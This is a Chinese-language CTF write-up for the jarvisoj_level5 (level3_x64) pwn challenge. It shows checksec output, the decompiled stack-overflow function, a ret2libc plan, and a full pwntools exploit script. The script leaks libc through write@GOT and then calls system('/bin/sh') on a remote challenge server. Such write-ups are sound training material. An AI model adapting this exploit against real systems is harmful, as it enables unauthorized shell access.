加载头像

jarvisoj_level5

Ubuntu 16 来源:https://github.com/bash-c/pwn_repo

level3_x64


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/jarvisoj_level5/level3_x64'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

IDA

vulnerable_function()

1
2
3
4
5
6
7
ssize_t vulnerable_function()
{
char buf[128]; // [rsp+0h] [rbp-80h] BYREF

write(1, "Input:\n", 7uLL);
return read(0, buf, 0x200uLL);
}

0x02


思路 ret2libc x64

1.溢出泄露libc

2.计算地址

3.溢出执行system

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
io = remote('node4.buuoj.cn', 28268)
path = './level3_x64'
# io = process([path])
elf = ELF(path)
libc = ELF('./libc-2.23.so')

padding = 0x80 + 8
main = elf.symbols['main']
write_plt = elf.plt['write']
write_got = elf.got['write']
pop_rdi_ret = 0x4006b3 # pop rdi ; ret
pop_rsi_r15_ret = 0x4006b1 # pop rsi ; pop r15 ; ret
payload = flat(b'a'*padding, pop_rdi_ret, 1, pop_rsi_r15_ret, write_got, 0x8, write_plt, main)
delims = b'Input:\n'
io.sendlineafter(delims, payload)
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
print('[+] write_address -->', hex(write_addr))

libc_base = write_addr - libc.symbols['write']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))
print('[+] libc_base -->', hex(libc_base))
print('[+] system -->', hex(system))
print('[+] bin_sh -->', hex(bin_sh))
payload1 = flat(b'a'*padding, pop_rdi_ret, bin_sh, system)
io.sendline(payload1)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體